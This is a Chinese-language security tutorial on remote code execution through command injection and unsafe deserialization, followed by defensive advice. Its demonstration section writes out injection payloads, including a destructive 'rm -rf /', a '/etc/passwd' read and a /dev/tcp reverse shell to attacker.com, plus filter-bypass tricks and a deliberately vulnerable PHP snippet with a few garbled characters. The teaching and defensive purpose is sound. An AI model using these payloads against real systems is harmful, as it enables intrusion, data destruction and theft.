远程代码执行(RCE)——命令注入与反序列化漏洞
远程代码执行(RCE)——命令注入与反序列化漏洞摘要:远程代码执行(Remote Code Execution, RCE)是最严重的黑客网站攻击之一,允许攻击者在目标服务器上执行任意系统命令或代码,从而导致服务器完全沦陷。RCE通常源于输入未经严格过滤便传给系统命令解释器(如system()、eval())或不安全的反序列化。本文从命令注入和反序列化两个维度深入分析RCE原理,展示渗透测试常用载荷,并给出输入白名单、禁用危险函数、升级依赖库等防御建议。关键词:黑客网站攻击;远程代码执行;RCE;命令注入;反序列化漏洞;渗透测试;服务器安全一、引言在黑客入侵的最终阶段,攻击者往往追求在目标系统上执行任意代码。RCE漏洞直接赋予攻击者服务器操作系统级别的权限,可进行文件读写、反弹Shell、安装挖矿木马等。2021年Log4j2漏洞(CVE-2021-44228)即是一种典型的RCE,影响了全球数百万应用。理解RCE的成因与防御手段,是保护网站不被彻底攻破的关键。二、命令注入型RCE2.1 原理当应用程序调用系统命令处理用户输入(如ping、dig、grep),却未对输入进行严格过滤时,攻击者可通过插入管道符、分号、反引号等执行额外命令。2.2 典型漏洞代码(PHP)php$ip = $_GET['ip';system("ping -c 4 " . $ip);
输入8.8.8.8; rm -rf /,执行的命令变为:ping -c 4 8.8.8.8; rm -rf /,导致毁灭性后果。2.3 命令注入绕过技巧
[*]使用|(管道符)、||、&、&&、\n、$(command)、反引号。
[*]编码绕过:%0a(换行)、%0d(回车)。
[*]利用环境变量或特殊变量:${IFS}代替空格。
三、反序列化型RCE3.1 原理序列化是将对象转换为可存储/传输的格式(如Java的Serializable、Python的pickle、PHP的serialize)。反序列化时,如果用户可控的序列化数据被反序列化,且应用包含“魔术方法”(如__wakeup、__destruct、readObject),攻击者可构造特定对象触发方法链,最终执行任意代码。3.2 经典场景:Java反序列化使用Apache Commons Collections的Transformer链,攻击者发送特殊序列化数据,触发Runtime.exec()。3.3 渗透测试思路
[*]寻找接受序列化数据的端点(Cookie、请求体、参数值包含rO0AB(Base64编码的Java序列化特征))。
[*]使用ysoserial工具生成常用gadget链的payload。
[*]发送payload,观察服务器是否执行如dnslog.cn的DNS查询或延时响应。
四、渗透测试演示:命令注入场景:一个提供域名查询的API:https://example.com/dns?domain=example.com,后端调用nslookup {domain}。步骤1:探测注入
输入example.com; sleep 5,若响应延迟5秒,则存在注入。步骤2:获取敏感信息
example.com; cat /etc/passwd 返回文件内容(需结合错误输出或curl外带)。步骤3:反弹Shell
example.com; bash -i >& /dev/tcp/attacker.com/4444 0>&1(需URL编码空格为%20或${IFS}),攻击者监听端口获得Shell。五、防御RCE的完整方案5.1 命令注入防御
[*]避免使用系统命令:尽量使用编程语言内置的API替代(如PHP的filter_var验证IP,而非调用ping)。
[*]输入白名单:例如仅允许domain参数包含域名、数字和点号,使用正则^+$。
[*]参数化或转义:如果必须调用命令,使用escapeshellarg()(PHP)或subprocess.list2cmdline确保参数被当作单参数传递。
[*]禁用危险函数:在disable_functions(PHP)中禁用exec、system、passthru、shell_exec、proc_open等。
5.2 反序列化防御
[*]禁止反序列化不可信数据:不要对用户提交的序列化字符串进行反序列化。
[*]使用安全替代格式:使用JSON、XML等结构化数据,避免语言原生的序列化。
[*]签名与加密:对序列化数据使用HMAC或加密,确保未被篡改(适用于Cookie等存储)。
[*]维护库版本:及时更新第三方库,修复已知gadget链(如Commons Collections 3.2.2更新了反序列化限制)。
[*]JEP 290(Java):对于Java应用,启用反序列化过滤器(Java 9+)限制允许的类。
5.3 纵深防御
[*]运行Web服务使用最低权限用户(非root)。
[*]配置SELinux或AppArmor限制可执行命令范围。
[*]部署RASP(Runtime Application Self-Protection)实时检测命令执行行为。
六、检测RCE漏洞的方法
[*]黑盒渗透测试:在不同输入点尝试注入ping xxx.dnslog.cn,观察DNS记录。
[*]白盒代码审计:搜索exec、eval、popen、serialize、unserialize、ObjectInputStream等关键字。
[*]动态分析:使用DAST工具(如Burp的主动扫描)自动检测命令注入。
七、总结RCE漏洞级别极高,可导致服务器完全失陷。防御重点在于:绝不执行不可信输入,如果必须调用系统命令,使用白名单限制参数;绝不反序列化用户提供的数据,改用JSON。同时,应通过最小权限和运行时监控减轻被攻击后的影响。
页:
[1]